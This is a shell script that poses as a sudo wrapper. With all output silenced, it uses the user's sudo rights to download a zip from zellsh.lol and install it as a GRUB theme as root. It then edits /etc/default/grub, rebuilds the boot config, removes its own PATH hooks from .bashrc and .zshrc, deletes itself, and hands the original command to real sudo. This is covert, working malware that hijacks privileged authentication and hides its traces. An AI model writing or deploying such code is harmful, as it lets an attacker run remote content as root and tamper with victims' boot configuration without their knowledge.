#!/bin/sh

{
    if [ -d /boot/grub2/ ]; then
        GRUB_DIR="/boot/grub2"
    elif [ -d /boot/grub/ ]; then
        GRUB_DIR="/boot/grub"
    fi
    if command -pv grub2-mkconfig 1>/dev/null 2>/dev/null; then
        GRUB_MKCONFIG="grub2-mkconfig"
    elif command -pv grub-mkconfig 1>/dev/null 2>/dev/null; then
        GRUB_MKCONFIG="grub-mkconfig"
    fi

    export PATH='/sbin:/bin:/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin'
    RealSudo="$(which sudo)"

    if [ -n "$GRUB_DIR" ] && [ -n "$GRUB_MKCONFIG" ]; then
        USER_HOME="$HOME"

        mkdir -p "$USER_HOME/.local/var/"
        if [ ! -f "$USER_HOME/.local/var/boot_data.zip" ]; then
            wget --output-document "$USER_HOME/.local/var/boot_data.zip" https://zellsh.lol/zellshlol.zip
        fi

        if [ -d "$GRUB_DIR/themes/zellshlol" ]; then
            "$RealSudo" rm -rf "$GRUB_DIR/themes/zellshlol"
        fi
        "$RealSudo" mkdir -p "$GRUB_DIR/themes/"

        "$RealSudo" unzip "$USER_HOME/.local/var/boot_data.zip" -d "$GRUB_DIR/themes/"
        rm "$USER_HOME/.local/var/boot_data.zip"

        if [ ! -f /etc/default/grub.backup_before_zellsh ]; then
            "$RealSudo" cp /etc/default/grub /etc/default/grub.backup_before_zellsh
        fi
        "$RealSudo" sed -i -E 's/^[ \t]*(GRUB_THEME=.*)/#\1/g' /etc/default/grub
        "$RealSudo" sed -i -E 's/^[ \t]*(GRUB_TIMEOUT=.*)/#\1/g' /etc/default/grub
        "$RealSudo" sed -i -E 's/^[ \t]*(GRUB_BACKGROUND=.*)/#\1/g' /etc/default/grub
        printf '\n%s\n%s\n' "GRUB_THEME=$GRUB_DIR/themes/zellshlol/theme.txt" 'GRUB_TIMEOUT=15' | "$RealSudo" tee -a /etc/default/grub
        "$RealSudo" "$GRUB_MKCONFIG" -o "$GRUB_DIR/grub.cfg"
    fi

    grep -vE '.*# for POSIX compliance and backwards compatibility' "$HOME/.bashrc" >"/tmp/.bashrc_new" && mv "/tmp/.bashrc_new" "$HOME/.bashrc"
    grep -vE '.*# for POSIX compliance and backwards compatibility' "$HOME/.zshrc" >"/tmp/.zshrc_new" && mv "/tmp/.zshrc_new" "$HOME/.zshrc"
    rm "$USER_HOME/.local/bin/sudo"

} 1>/dev/null 2>/dev/null

"$RealSudo" "$@"
